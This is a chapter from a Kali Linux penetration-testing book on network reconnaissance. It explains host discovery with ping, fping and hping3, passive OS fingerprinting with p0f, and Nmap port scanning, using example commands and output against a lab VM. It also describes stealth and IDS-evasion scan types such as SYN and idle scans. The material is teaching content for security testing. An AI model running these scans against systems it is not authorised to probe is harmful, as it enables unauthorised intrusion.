Chapter 5: Scanning and Evasion Techniques

This chapter describes the process of discovering devices on a target network using various tools in Kali Linux and other tools available on GitHub. We will cover the following topics:

• Description of the target discovery process
• Methods for identifying target machines using Kali Linux tools
• Steps required to determine the operating system of a target machine (OS fingerprinting)
• Automated scanning with Striker
• Anonymization with Nipe

To help you understand these concepts easily, we will use a virtual network as the target.

Technical Requirements

These are the technical requirements:

• Minimum hardware: 6 GB RAM, quad-core 2.4 GHz processor, and 500 GB hard drive
• Kali Linux 2018
• Virtual machines for testing, such as Metasploitable or BadStore (refer to Chapter 2, Setting Up Your Testing Lab)

Identifying Target Machines

These tools are used to identify target machines accessible to a penetration tester. Before starting the identification process, we need to understand the client's terms and agreements. If the agreement requires us to hide penetration testing activities, we need to conceal our activities. Stealth techniques can also be used to test the capabilities of Intrusion Detection Systems (IDS) or Intrusion Prevention Systems (IPS). If no such requirement exists, we may not need to hide our activities.

ping

The ping command is the most well-known tool for checking the availability of a specific host. The ping tool works by sending Internet Control Message Protocol (ICMP) echo request packets to the target host. If the target host is available and the firewall is not blocking these ICMP echo request packets, it will reply with an ICMP echo reply packet.

ICMP echo request and ICMP echo reply are among the available ICMP control messages. For other ICMP control messages, see the following URL: en.wikipedia.org/wiki/Internet_Control_Message_Protocol#Control_messages.

While you won't find ping in the Kali Linux menu, you can open a console and type the ping command along with its options.

To use ping, simply type ping followed by the target address, as shown in the following screenshot:

In Kali Linux, by default, ping will run continuously until you press Ctrl + C.

The ping tool has many options, but here are some frequently used ones:

• -c count: The number of echo request packets to send.
• -I interface address: The network interface for the source address. The argument can be a numeric IP address (e.g., 192.168.56.102) or the name of the device (e.g., eth0). This option is required when pinging an IPv6 link-local address.
• -s packet size: Specifies the number of data bytes to send. The default value is 56 bytes, which, when combined with the 8-byte ICMP header data, results in 64 ICMP data bytes.

Let's put the foregoing information into practice.

Suppose you are starting an internal penetration testing job. The client provides you with network access via a LAN cable and a list of IP addresses for target servers.

One of the first things you might want to do is check if these servers are accessible from your machine. You can use ping for this task.

The target server is at 172.16.43.156, and your machine's IP address is 172.16.43.150. To check the target server's availability, you can issue the following command:

ping -c 1 172.16.43.156

Besides IP addresses, ping also accepts hostnames as targets.

The following screenshot is the result of the preceding ping command:

From the previous screenshot, we know that one ICMP echo request packet was sent to the destination (IP address = 172.16.43.156). Simultaneously, the sending host (IP address = 172.16.43.150) received one ICMP echo reply packet. The required round-trip time was .869 ms, with no packet loss throughout the process.

Let's look at the network packets our machine sent and received. We'll use the network protocol analyzer Wireshark on our machine to capture these packets, as shown in the following figure:

From the preceding screenshot, we can see that our host (172.16.43.150) sent an ICMP echo request packet to the target host (172.16.43.156). Since the target is active and allows ICMP echo request packets, it sends an ICMP echo reply packet back to our machine. We will cover Wireshark in more detail in Chapter 9, Privilege Escalation, in the Network Sniffer section.

If your target uses an IPv6 address, such as fe80::20c:29ff:fe18:f08, you can use the ping6 tool to check its availability. You need to specify the -I option for the command to work with link-local addresses:

# ping6 -c 1 fe80::20c:29ff:fe18:f08 -I eth0
PING fe80::20c:29ff:fe18:f08(fe80::20c:29ff:fe18:f08) from fe80::20c:29ff:feb3:137 eth0: 56 data bytes
64 bytes from fe80::20c:29ff:fe18:f08: icmp_seq=1 ttl=64 time=7.98 ms

--- fe80::20c:29ff:fe18:f08 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 7.988/7.988/7.988/0.000 ms

The following screenshot shows the packets sent after completing the ping6 request:

From the previous screenshot, we know that ping6 is using ICMPv6 requests and replies.

To block ping requests, a firewall can be configured to allow ICMP echo request packets only from specific hosts and discard packets sent from other hosts.

fping

The difference between ping and fping is that the fping tool can be used to send ping (ICMP echo) requests to multiple hosts at once. You can specify multiple targets on the command line or use a file containing the hosts to ping.

In the default mode, fping works by monitoring replies from target hosts. If a target host sends a reply, it is recorded and removed from the target list. If a host does not respond within a certain time, it is marked as unreachable. By default, fping will attempt to send three ICMP echo request packets to each target.

To access fping, you can execute the following command in the console:

# fping -h

This will display the usage and description of available options in fping.

The following scenario will give you an idea of fping's usage.

If we want to know the active hosts among 172.16.43.156, 172.16.43.150, and 172.16.43.155 at once, we can use the following command:

fping 172.16.43.156 172.16.43.150 172.16.43.155  

The following is the result of the preceding command:

# fping 172.16.43.156 172.16.43.150 172.16.43.155
172.16.43.156 is alive
172.16.43.150 is alive
ICMP Host Unreachable from 172.16.43.150 for ICMP Echo sent to 172.16.43.155
ICMP Host Unreachable from 172.16.43.150 for ICMP Echo sent to 172.16.43.155
ICMP Host Unreachable from 172.16.43.150 for ICMP Echo sent to 172.16.43.155
ICMP Host Unreachable from 172.16.43.150 for ICMP Echo sent to 172.16.43.155
172.16.43.155 is unreachable 

We can also automatically generate a list of hosts without defining individual IP addresses and identifying active hosts. Suppose we want to find active hosts in the 172.16.43.0/24 network; we can use the -g option and define the network to check, using the following command:

# fping -g 172.16.43.0/24  

If we want to change the number of ping attempts sent to a target, we can use the -r option (retry limit), as shown in the following command line. By default, there are three ping attempts:

fping  -r 1 -g 172.16.43.149 172.16.43.160

The result of the command is as follows:

# fping -r 1 -g 172.16.43.149 172.16.43.160
172.16.43.150 is alive
172.16.43.156 is alive
172.16.43.149 is unreachable
172.16.43.151 is unreachable
172.16.43.152 is unreachable
172.16.43.153 is unreachable
172.16.43.154 is unreachable
172.16.43.155 is unreachable
172.16.43.157 is unreachable
172.16.43.158 is unreachable
172.16.43.159 is unreachable
172.16.43.160 is unreachable

Cumulative statistics can be displayed using the -s option (print cumulative statistics), as follows:

fping -s www.yahoo.com www.google.com www.msn.com

Here is the result of the preceding command line:

#fping -s www.yahoo.com www.google.com www.msn.com
www.yahoo.com is alive
www.google.com is alive
www.msn.com is alive

       3 targets
       3 alive
       0 unreachable
       0 unknown addresses

       0 timeouts (waiting for response)
       3 ICMP Echos sent
       3 ICMP Echo Replies received
       0 other ICMP received

 28.8 ms (min round trip time)
 30.5 ms (avg round trip time)
 33.6 ms (max round trip time)
        0.080 sec (elapsed real time)

hping3

The hping3 tool is a command-line network packet generator and analyzer tool. The ability to create custom network packets makes hping3 useful for TCP/IP and security testing, such as port scanning, firewall rules testing, and network performance testing.

According to the developer, hping3 also has the following uses:

• Testing firewall rules
• Testing IDS
• Exploiting known vulnerabilities in the TCP/IP stack

To access hping3, go to the console and type hping3.

You can give commands to hping3 via the command line, an interactive shell, or a script.

Without given command-line options, hping3 will send an empty TCP packet to port 0.

To switch to a different protocol, you can use the following options in the command line to define the protocol:

No.	Short option	Long option	Description
1	-0	--raw-ip	This sends raw IP packets
2	-1	--icmp	This sends ICMP packets
3	-2	--udp	This sends UDP packets
4	-8	--scan	This indicates to use scan mode
5	-9	--listen	This indicates to use listen mode

When using the TCP protocol, we can use TCP packets without any flags (this is the default behavior), or we can use one of the following flag options:

No.	Option	Flag name
1	-S	syn
2	-A	ack
3	-R	rst
4	-F	fin
5	-P	psh
6	-U	urg
7	-X	xmas: flags fin, urg, psh set
8	-Y	ymas

Let's use hping3 for several scenarios.

Sending an ICMP echo request packet to the 192.168.56.101 machine. The options used are -1 (for ICMP protocol) and -c 1 (set count to one packet):

hping3 -1 172.16.43.156 -c 1

Here is the output of this command:

# hping3  -1 172.16.43.156 -c 1
HPING 172.16.43.156 (eth0 172.16.43.156): icmp mode set, 28 headers + 0 data bytes
len=46 ip=172.16.43.156 ttl=64 id=63534 icmp_seq=0 rtt=2.5 ms

--- 172.16.43.156 hping statistic ---
1 packets transmitted, 1 packets received, 0% packet loss
round-trip min/avg/max = 2.5/2.5/2.5 ms

From the previous output, we can determine that the target machine is alive because it has replied to our ICMP echo request.

To verify this, we captured the traffic using tcpdump. The following screenshot shows the packets:

We can see that the target has responded with an ICMP echo reply packet.

Besides giving options on the command line, you can also use hping3 interactively. Open the console and type hping3. Then, you will see a prompt where you can enter your Tcl commands.

The following links are resources for Tcl: www.invece.org/tclwise/ and wiki.tcl.tk/.

For the above example, the corresponding Tcl script is as follows:

hping3> hping send {ip(daddr=172.16.43.156)+icmp(type=8,code=0)}

Open a command-line window, and enter the following command to get a response from the target server:

hping recv eth0

After that, open another command-line window to enter the send request.

The following screenshot shows the received response:

You can also use hping3 to check firewall rules. Suppose you have the following firewall rules:

• Accept any TCP packet sent to port 22 (SSH)
• Accept any TCP packet related to an established connection
• Drop other packets

To check these rules, you can give the following command in hping3 to send an ICMP echo request packet:

hping3 -1 172.16.43.156 -c 1  

The following code is the result:

# hping3 -1 172.16.43.156 -c 1 
HPING 172.16.43.156 (eth0 172.16.43.156): icmp mode set, 28 headers + 0 data bytes 
--- 172.16.43.156 hping statistic --- 
1 packets transmitted, 0 packets received, 100% packet loss 
round-trip min/avg/max = 0.0/0.0/0.0 ms 

We can see that the target machine did not respond to our ping probe.

Sending a TCP packet with the SYN flag set to port 22 will give us the result shown in the following screenshot:

From the preceding screenshot, we can see that the target machine's firewall allows our SYN packet to reach port 22.

Let's check if UDP packets are allowed to reach port 22:

From the preceding screenshot, we can see that the target machine's firewall does not allow our UDP packet to reach port 22.

The hping3 has other features, but in this chapter, we only discussed a small portion of its capabilities. If you want to learn more, you can consult the hping3 documentation website.

Operating System Fingerprinting

After confirming that the target machine is alive, we can find out what operating system the target machine uses. This method is often called Operating System (OS) fingerprinting. There are two methods for OS fingerprinting: active and passive.

In the active method, the tool sends network packets to the target machine and then analyzes the received responses to determine the target's operating system. The advantage of this method is that the fingerprinting process is fast. However, the downside is that the target machine may notice our attempt to get its OS information.

To overcome the disadvantages of the active method, a passive OS fingerprinting method exists. This method was pioneered by Michal Zalewsky, who released a tool called p0f. The main advantage of passive OS fingerprinting is that it gets the job done with reduced interaction between the testing machine and the target, greatly increasing the stealth of fingerprinting. The biggest drawback of the passive method is that the process is slower than the active method.

In this section, we will describe some tools for OS fingerprinting.

p0f

The p0f tool is used to passively fingerprint an operating system. It can be used to identify the OS on the following machines:

• Machines connecting to your machine (SYN mode; this is the default mode)
• Machines connecting to your machine (SYN + ACK mode)
• Machines with which you cannot connect (RST+ mode)
• Machines whose communication you can observe

The p0f tool works by analyzing TCP packets sent during network activity. It then collects statistics on special packets that are not standardized by any company by default. For example, Linux kernel uses 64-byte ping datagrams, while Windows OS uses 32-byte ping datagrams or Time to Live (TTL) values. For Windows, the TTL value is 128, whereas for Linux, this TTL value varies among Linux distributions. Then, p0f uses this information to determine the OS of the remote machine.

When using the p0f tool that comes with Kali Linux, we are unable to fingerprint the OS on a remote machine. We found that the p0f tool has not updated its fingerprint database. Unfortunately, we could not find a recent version of the fingerprint database. Therefore, we used p0f v3 (version 3.06b). To use this version of p0f, simply download the TARBALL file from lcamtuf.coredump.cx/p0f3/releases/p0f-3.06b.tgz and compile the code by running the build.sh script. By default, the location of the fingerprint database file (p0f.fp) is in the current directory. To change the location, for example, to /etc/p0f/p0f.fp, you need to change this location in the config.h file and recompile p0f. If you do not change the location, you may need to use the -f option to define the location of the fingerprint database file.

To access p0f, open a console and type p0f -h. This will display its usage and option description. Let's use p0f to identify the operating system used on a remote machine we are connecting to. Simply type the following command in the console:

 p0f -f /etc/p0f/p0f.fp -o p0f.log

This will read the fingerprint database from the file and save log information to the p0f.log file. It will then display the following information:

    --- p0f 3.07b by Michal Zalewski <lcamtuf@coredump.cx> ---

[+] Closed 1 file descriptor.
[+] Loaded 320 signatures from '/usr/share/p0f/p0f.fp'.
[+] Intercepting traffic on default interface 'eth0'.
[+] Default packet filtering configured [+VLAN].
[+] Log file 'p0f.log' opened for writing.
[+] Entered main event loop.

Next, you need to generate network activity involving TCP connections, such as browsing to a remote machine or having a remote machine connect to your machine. For demonstration, a connection was established to an HTTP site on Machine 2.

If p0f successfully fingerprints the OS, you will see information about the remote machine's OS in the console and the log file (p0f.log).

The following is a summary information displayed on the console:

.-[ 172.16.43.150/41522 -> 172.16.43.156/80 (syn+ack) ]-
|
| server   = 172.16.43.156/80
| os       = Linux 2.6.x
| dist     = 0
| params   = none
| raw_sig  = 4:64+0:0:1460:mss*4,5:mss,sok,ts,nop,ws:df:0

The following screenshot shows the contents of the log file:

Based on the previous results, we know that the target is a Linux 2.6 machine.

The following screenshot shows information from the target machine:

By comparing this information, we know that p0f correctly obtained the OS information. The remote machine is using Linux version 2.6.

You can stop p0f by pressing the Ctrl + C combination.

Introduction to Port Scanning

The simplest definition of port scanning is that it is a method for determining the status of Transmission Control Protocol (TCP) and User Datagram Protocol (UDP) ports on a target machine. An open port may mean that there is a network service listening on that port and that the service is accessible, while a closed port means that no network service is listening on that port.

After obtaining the port status, an attacker will check the software version used by the network service and find out the vulnerabilities for that software version. For example, suppose Server A has web server software version 1.0. A few days ago, a security advisory was published. The advisory provided information about a vulnerability in web server software version 1.0. If the attacker discovers Server A's web server and can obtain version information, the attacker can use this information to attack the server. This is just a simple example of what an attacker can do after getting information about the services available on a machine.

Before we dive into port scanning, let's discuss the theory of the TCP/IP protocol.

Understanding the TCP/IP Protocol

In the TCP/IP protocol suite, there are dozens of different protocols, but the most important are TCP and IP. IP provides addressing, packet routing, and other functions for connecting one machine to another, while TCP is responsible for managing the connection and providing reliable data transfer between processes on two machines. IP resides at the network layer (Layer 3) of the Open Systems Interconnection (OSI) model, while TCP resides at the transport layer (Layer 4) of the OSI model.

Besides TCP, another key protocol in the transport layer is UDP. You might ask what the difference is between these two protocols.

In short, TCP has the following characteristics:

• It is a connection-oriented protocol: Before TCP can be used to send data, the client and server that want to communicate must establish a TCP connection using a three-way handshake mechanism, as follows:

  • The client initiates the connection by sending a packet with the SYN (synchronize) flag set. The client also sends the Initial Sequence Number (ISN) in the sequence number field of the SYN segment. This ISN is randomly chosen.
  • The server replies with its own SYN segment, which contains its own ISN. The server acknowledges the client's SYN by sending an ACK (acknowledgment) flag containing the value of the client's ISN + 1.
  • The client acknowledges the server by sending an ACK flag containing the server's ISN + 1. At this point, the client and server can exchange data.

• To terminate the connection, TCP must follow this mechanism:

  • The client sends a packet with the FIN (finish) flag set.
  • The server sends an ACK (acknowledgment) packet to inform the client that the server has received the FIN packet.
  • After the application server is ready to close, the server sends a FIN packet.
  • Then, the client sends an ACK packet to acknowledge receipt of the server's FIN packet. Under normal circumstances, each side (client or server) can independently terminate its communication end by sending a FIN packet.

• It is a reliable protocol: TCP uses sequence numbers and acknowledgments to identify packet data. The receiver sends an acknowledgment upon receiving a packet. When a packet is lost, if no acknowledgment is received from the receiver, TCP will automatically retransmit. If packets arrive out of order, TCP will reorder them before submitting them to the application.

• Applications that need to transfer files or important data use TCP, such as Hypertext Transfer Protocol (HTTP) and File Transfer Protocol (FTP).

UDP has the opposite characteristics to TCP, as follows:

• It is a connectionless protocol. To send data, the client and server do not need to establish a UDP connection first.
• It does its best to send packets to the destination, but if a packet is lost, UDP will not automatically resend it. It is up to the application to retransmit the packet.

Applications that can tolerate some packet loss, such as video streaming and other multimedia applications, use UDP. Other well-known applications that use UDP include Domain Name System (DNS), Dynamic Host Configuration Protocol (DHCP), and Simple Network Management Protocol (SNMP).

To enable applications to communicate correctly, the transport layer uses an addressing mechanism called ports. A software process listens on a specific port number on the server side, and the client machine sends data to that server port for processing by the server application. Port numbers have a 16-bit address, with numbers ranging from 0 to 65,535. To avoid chaotic use of port numbers, the common convention for port number ranges is as follows:

• Well-known port numbers (0 to 1,023) : Port numbers in this range are reserved port numbers, usually used by server processes run by system administrators or privileged users. Examples of port numbers used by application servers include SSH (port 22), HTTP (port 80), and HTTPS (port 443).
• Registered port numbers (1,024 to 49,151) : Users can send a request to the Internet Assigned Numbers Authority (IANA) to reserve one of these port numbers for their client-server application.
• Private or dynamic port numbers (49,152 to 65,535) : Anyone can use port numbers in this range without registering with IANA.

After briefly discussing the differences between TCP and UDP, let's describe the TCP and UDP message formats.

Understanding TCP and UDP Message Formats

A TCP message is called a segment. A TCP segment consists of a header and a data portion. The TCP header is typically 20 bytes long (excluding TCP options). The TCP header can be described using the following screenshot:

Here is a brief description of each field:

• Source Port and Destination Port are each 16 bits long. The source port is the port on the sending machine from which the packet is transmitted, while the destination port is the port on the target machine that receives the packet.

• Sequence Number (32 bits) is, during normal transmission, the sequence number of the first byte of the data in this segment.

• Acknowledgment Number (32 bits) contains the sender's sequence number incremented by one.

• H.Len. (4 bits) is the size of the TCP header in 32-bit words.

• Rsvd. is reserved for future use. It is a 4-bit field that must be zero.

• Control Bits (Control Flags) contain eight 1-bit flags. In the original specification (RFC 793; the RFC can be downloaded from www.ietf.org/rfc/rfc793.txt), TCP has only six flags as follows:

  • SYN: This flag synchronizes sequence numbers. This bit is used during session establishment.
  • ACK: This flag indicates that the Acknowledgment field in the TCP header is significant. If a packet contains this flag, it means it is an acknowledgment of a previously received packet.
  • RST: This flag resets the connection.
  • FIN: This flag indicates that one side has no more data to send. It is used to gracefully terminate a connection.
  • PSH: This flag indicates that buffered data should be pushed to the application immediately, rather than waiting for more data.
  • URG: This flag indicates that the Urgent Pointer field in the TCP header is significant. The urgent pointer points to the sequence number of significant data.

Later, RFC 3168 (the RFC can be downloaded from www.ietf.org/rfc/rfc3168.txt) added two extension flags as follows:

• Congestion Window Reduced (CWR): This is used by the data sender to inform the data receiver that it has reduced the pending packet queue to be sent due to network congestion.
• Explicit Connection Notification-Echo (ECN-Echo): This indicates that the network connection is experiencing congestion.
• Window Size (16 bits) specifies the number of bytes the receiver is willing to accept.
• Checksum (16 bits) is used for error checking of the TCP header and data.

Flags can be set independently.

For more information about TCP, refer to RFC 793 and RFC 3168.

When port scanning a target machine's TCP ports using SYN packets, an attacker may encounter the following behaviors:

• The target machine responds with a SYN+ACK packet. If we receive this packet, we know the port is open. This behavior is defined in the TCP specification (RFC 793), which states that if a port is open, a SYN packet must be replied to with a SYN + ACK packet, regardless of the SYN packet's payload.
• The target machine sends a packet with the RST and ACK bits set. This means the port is closed.
• The target machine sends an ICMP message, such as ICMP Port Unreachable, which means the port is inaccessible to us, most likely because a firewall is blocking it.
• The target machine does not respond to us at all. This could indicate that no network service is listening on that port, or that a firewall is silently blocking our SYN packets.

From a penetration tester's perspective, the behavior when a port is open is interesting, because it means there is a service on that port that can be further tested.

If you are performing a port scanning attack, you should be aware of the list of various TCP behaviors to be able to attack more effectively.

When scanning UDP ports, you will see different behaviors; these will be explained later. Before we move on to various UDP behaviors, let's look at the UDP header format, as shown in the following figure:

Here is a brief explanation of each field in the UDP header, as shown in the previous figure.

Like the TCP header, the UDP header also has Source Port and Destination Port, each 16 bits long. The source port is the port on the sending machine from which the packet is transmitted, while the destination port is the port on the target machine that receives the packet.

• UDP Length is the length of the UDP header
• UDP Checksum (16 bits) is used for error checking of the UDP header and data

Note that there are no sequence number, acknowledgment number, and control bit fields in the UDP header.

When conducting port scanning activities on a target machine's UDP ports, an attacker may encounter the following behaviors:

• The target machine responds with a UDP packet. If we receive this packet, we know the port is open.

• The target machine sends an ICMP message, such as ICMP Port Unreachable. It can be concluded that the port is closed. However, if the message sent is not an ICMP Unreachable message, it means the port is filtered by a firewall.

• The target machine does not respond to us at all. This could indicate one of the following:

  • The port is closed
  • Inbound UDP packets are blocked
  • Responses are blocked

Compared to TCP port scanning, UDP port scanning is less reliable because sometimes a UDP port is open, but the service listening on that port is looking for a specific UDP payload. So, the service will not send any reply.

Now that we have briefly described the port scanning theory, let's put it into practice. In the next few sections, we will look at several tools that can help us with network scanning.

In the practical scenarios of this chapter, we will utilize a Metasploitable virtual machine as our target. Its IP address is 172.16.43.156, and our attack machine's IP address is 172.16.43.150.

Network Scanners

In this section, we will look at several tools that can be used to find open ports, fingerprint remote OSes, and enumerate services on remote machines.

Service enumeration is a method used to find the version of a service available on a specific port on the target system. This version information is important because with it, a penetration tester can search for security vulnerabilities that exist in that software version.

Although standard ports are commonly used, sometimes system administrators change the default port for certain services. For example, an SSH service might be bound to port 22 (as a convention), but a system administrator might change it to bind to port 2222. If a penetration tester only does port scanning on common ports for SSH, they might not find the service. Penetration testers may also face difficulties when dealing with proprietary applications running on non-standard ports. By using service enumeration tools, both problems can be mitigated, making it possible to find the service regardless of which port it is bound to.

Nmap

Nmap is a comprehensive, feature-rich, and widely used port scanner in the IT security community. It was written and is maintained by Fyodor. Due to its quality and flexibility, it is an indispensable tool for penetration testers.

Besides its use as a port scanner, Nmap also has the following features:

• Host discovery: Nmap can be used to find active hosts on the target system. By default, Nmap will send an ICMP echo request, a TCP SYN packet to port 443, a TCP ACK packet to port 80, and an ICMP timestamp request for host discovery.
• Service/version detection: After Nmap discovers a port, it can further check the service protocol, application name, and version number used on the target machine.
• OS detection: Nmap sends a series of packets to the remote host and examines the responses. It then compares these responses to its OS fingerprint database and prints detailed information if there is a match. If it cannot determine the OS, Nmap will provide a URL where you can submit the fingerprint to update its OS fingerprint database. Certainly, if you know the OS used by the target system, you should submit the fingerprint.
• Network route tracing: This is to determine the most likely port and protocol to reach the target system. Nmap traceroute starts with a higher TTL value and decrements until the TTL value reaches zero.
• Nmap Scripting Engine: With this feature, Nmap can be extended. If you want to add a check that is not included in the default Nmap, you can write the check using the Nmap Scripting Engine. Currently, there are functions to check for vulnerabilities in network services and enumerate target system resources.

It is always a good habit to check for new versions of Nmap. If you find a recent version of Nmap for Kali Linux, you can update your Nmap by issuing the following command:

apt-get update
apt-get install nmap  

To start Nmap, go to Applications, then to Information Gathering. You can also start Nmap by going to the console and executing the following command:

nmap  

This will display all Nmap options and their descriptions.

For Nmap newcomers, the available options can be overwhelming.

Fortunately, you only need one option to scan a remote machine. That option is your target IP address or hostname, if you have set up DNS correctly. This can be done with the following command:

nmap 172.16.43.156

Here is the scan result without other options:

Nmap scan report for 172.16.43.156
Host is up (0.00025s latency).
Not shown: 977 closed ports
PORT     STATE SERVICE
21/tcp   open  ftp
22/tcp   open  ssh
23/tcp   open  telnet
25/tcp   open  smtp
53/tcp   open  domain
80/tcp   open  http
111/tcp  open  rpcbind
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
512/tcp  open  exec
513/tcp  open  login
514/tcp  open  shell
1099/tcp open  rmiregistry
1524/tcp open  ingreslock
2049/tcp open  nfs
2121/tcp open  ccproxy-ftp
3306/tcp open  mysql
5432/tcp open  postgresql
5900/tcp open  vnc
6000/tcp open  X11
6667/tcp open  irc
8009/tcp open  ajp13
8180/tcp open  unknown
MAC Address: 00:0C;29:18:0F:08 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 1.7 seconds

From the previous result, we can see that the target machine is quite vulnerable because it has many open ports.

Before proceeding with Nmap, let's look at the port states Nmap can recognize. Nmap can recognize six port states, as follows:

• Open: This means there is an application accepting TCP connections, UDP datagrams, or SCTP associations.
• Closed: This means that although the port is accessible, there is no application listening on it.
• Filtered: This means Nmap cannot determine whether the port is open because a packet filtering device is blocking the probe from reaching the target.
• Unfiltered: This means the port is accessible, but Nmap cannot determine whether it is open or closed.
• Open | Filtered: This means Nmap cannot determine whether the port is open or filtered. This occurs when there is no response to a scan of an open port. This can be achieved by configuring the firewall to drop packets.
• Closed | Filtered: This means Nmap cannot determine whether the port is closed or filtered.

After describing port states, we will describe several options commonly used in penetration testing, and then we will use these options in practice.

Nmap Target Specification

Nmap treats everything on the command line that is not an option or an option argument as a target host specification. We recommend using IP address specification rather than hostnames. By using IP addresses, Nmap does not need to perform DNS resolution first. This will speed up the port scanning process.

In the current version, Nmap supports the following IPv4 address specifications:

• It supports a single host, such as 172.16.43.156.
• It supports an entire network of adjacent hosts using CIDR notation, such as 172.16.43.0/24. This specification will include 256 IP addresses from 172.16.43.0 to 172.16.43.255.
• It supports octet range addressing, such as 172.16.2-4,6.1. This addressing will include four IP addresses: 172.16.2.1, 172.16.3.1, 172.16.4.1, and 172.16.6.1.
• It supports multiple host specifications, such as 172.16.43.1 172.168.3-5,9.1.

For IPv6 addresses, Nmap only supports fully qualified IPv6 formats and hostnames, such as fe80::a8bb:ccff:fedd:eeff%eth0.

Besides getting target specifications from the command line, Nmap can also accept target definitions from a text file by using the -iL <inputfilename> option. This option is useful if we have already obtained IP addresses from another program.

Make sure the entries in the file use the target specification format supported by Nmap. Each entry must be separated by spaces, tabs, or new lines.

The following code is an example of such a file:

172.16.1.1-254 
172.16.2.1-254 

Now, let's scan the network 172.16.43.0/24. We want to see the packets Nmap sends. To monitor the sent packets, we can use a packet capture utility like tcpdump.

Open a console and enter the following command:

tcpdump -nnX tcp and host 172.16.43.150  

The 172.16.43.150 IP address belongs to our machine, which initiated Nmap. You need to adjust it according to your configuration.

Open another console on the same machine and enter the following command:

nmap 172.16.43.0/24

In the tcpdump console, you will see the following packets:

22:42:12.107532 IP 172.16.43.150.49270 >172.16.43.156.23: Flags [S], seq 239440322, win 1024, options [mss 1460], length 0
  0x0000:  4500 002c eb7f 0000 3006 ad2e c0a8 3866  E..,....0.....8f
  0x0010:  c0a8 3867 c076 0017 0e45 91c2 0000 0000  ..8g.v...E......
  0x0020:  6002 0400 4173 0000 0204 05b4            `...As......

According to the previous packet information, we know that the attack machine sent a packet with the SYN flag set from port 49270 to the target machine's port 23 (Telnet). If Nmap is run by a privileged user (like root in Kali Linux), it will set the SYN flag by default.

The following screenshot shows the packets sent by the attack machine to other machines and ports on the target network:

If a remote machine responds, the response packet will look like this:

22:36:19.939881 IP 172.16.43.150.1720 >172.16.43.156.47823: Flags [R.], seq 0, ack 1053563675, win 0, length 0 
  0x0000:  4500 0028 0000 4000 4006 48b2 c0a8 3867  E..(..@.@.H...8g 
  0x0010:  c0a8 3866 06b8 bacf 0000 0000 3ecc 1b1b  ..8f........>... 
  0x0020:  5014 0000 a243 0000 0000 0000 0000       P....C........ 

Note that the flag sent is represented by the character R, which means Reset. This indicates that port 1720 in the target machine is closed. We can verify this through the previous Nmap result.

But, if the port is open, you will see the following network traffic:

22:42:12.108741 IP 172.16.43.156.23 >172.16.43.150.49270:Flags [S.], seq 1611132106, ack 239440323, win 5840,options [mss 1460], length 0 
  0x0000:  4500 002c 0000 4000 4006 48ae c0a8 3867  E..,..@.@.H...8g 
  0x0010:  c0a8 3866 0017 c076 6007 ecca 0e45 91c3  ..8f...v`....E.. 
  0x0020:  6012 16d0 e1bf 0000 0204 05b4 0000

You can see that the packet in the previous code is used to acknowledge the sequence number of the packet shown earlier. The acknowledgment number of this packet is 239440323, while the sequence number of the previous packet was 239440322.

Nmap TCP Scan Options

To be able to use most TCP scan options, Nmap requires a privileged user (root-level account in the Unix world or administrator-level account in the Windows world). This is used to send and receive raw packets. By default, Nmap will use TCP SYN scan, but if Nmap does not have a privileged user, it will use TCP connect scan. The various scans used by Nmap are as follows:

• TCP Connect Scan (-sT): This option will complete a three-way handshake with each target port. If the connection is successful, the port is considered open. This scan type is slower because the handshake is required for each port and is likely to be logged by the target. This is the default scan option if Nmap is run by a user without any privileges.
• SYN Scan (-sS): This option is also called half-open or SYN stealth. With this option, Nmap sends a SYN packet and then waits for a response. A SYN/ACK response indicates that the port is listening, while an RST/ACK response indicates that the port is not listening. If there is no response or an ICMP Unreachable error message response, the port is considered filtered. This scan type can be performed quickly and is less conspicuous and stealthy because the three-way handshake is never completed. This is the default scan option if Nmap is run as a privileged user.
• TCP NULL Scan (-sN), FIN Scan (-sF), and XMAS Scan (-sX): The NULL scan sets no control bits. The FIN scan sets only the FIN flag bit, while the XMAS scan sets the FIN, PSH, and URG flags. If an RST packet is received as a response, the port is considered closed, and no response indicates the port is open/filtered.
• TCP Maimon Scan (-sM): The TCP Maimon scan was discovered by Uriel Maimon. This type of scan sends a packet with the FIN/ACK flag bits set. If the port is open, BSD-based systems will drop the packet and respond with an RST if the port is closed.
• TCP ACK Scan (-sA): This scan type is used to determine if a firewall is stateful and which ports are filtered. Network packets of this type have only the ACK bit set. If an RST is returned, it indicates the target is unfiltered.
• TCP Window Scan (-sW): This scan type works by examining the TCP Window field of the RST packet response. Open ports will have a positive TCP window value, while closed ports will have a zero TCP window value.
• TCP Idle Scan (-sI): With this technique, your machine does not send any packets to the target; instead, the scan is bounced off a zombie host you specify. The IDS will report the zombie as the attacker.
• Nmap also supports creating your own custom TCP scan by providing the scanflags option. The argument for this option can be a number, such as 9 for PSH and FIN, or symbolic names. Simply combine URG, ACK, PSH, RST, SYN, FIN, ECE, CWR, ALL, and NONE in any order; for example, --scanflags URGACKPSH will set the URG, ACK, and PSH flags.

Disabling Host Discovery

If the host blocks ping requests, Nmap might detect the host as inactive; therefore, Nmap may not perform heavy probes like port scanning, version detection, and OS detection. To overcome this, Nmap has a feature to disable host discovery. Using this option, Nmap will assume the target machine is available and will perform heavy probes on that machine.

This option is activated using the -Pn option.

Nmap UDP Scan Options

Although there are many types of TCP scans, there is only one type for UDP scanning: UDP Scan (-sU). Although UDP scan is not as reliable as TCP scan, as a penetration tester, you should not ignore this scan, as there may be interesting services on these UDP ports.

The biggest problem with UDP scanning is how to perform it quickly. The Linux kernel limits sending ICMP Port Unreachable messages to one per second. Scanning 65,536 UDP ports on a single machine would take over 18 hours to complete.

To help mitigate this problem, several methods can be used, as follows:

• Run UDP scans in parallel
• Scan the most popular ports first
• Scan behind a firewall
• Set the --host-timeout option to skip slow hosts

These methods can help reduce the time required for a UDP port scan.

Let's look at a scenario where we want to find out open UDP ports on the target machine. To speed up the scanning process, we will check only ports 53 (DNS) and 161 (SNMP). The following command is used for this:

nmap -sU 172.16.43.156 -p 53,161  

Here is the result of this command:

Nmap scan report for 172.16.43.156
Host is up (0.0016s latency).
PORT    STATE  SERVICE
53/udp  open   domain
161/udp closed snmp  

Nmap Port Specification

In the default configuration, Nmap will only randomly scan the 1,000 most common ports for each protocol. The nmap-services file contains popularity scores for selecting the top ports.

To change this configuration, Nmap provides several options:

• -p port range: Only scans the defined ports. To scan ports 1 to 1024, the command is -p 1-1024. To scan ports 1 to 65535, the command is -p-.
• -F (Fast): This will only scan 100 common ports.
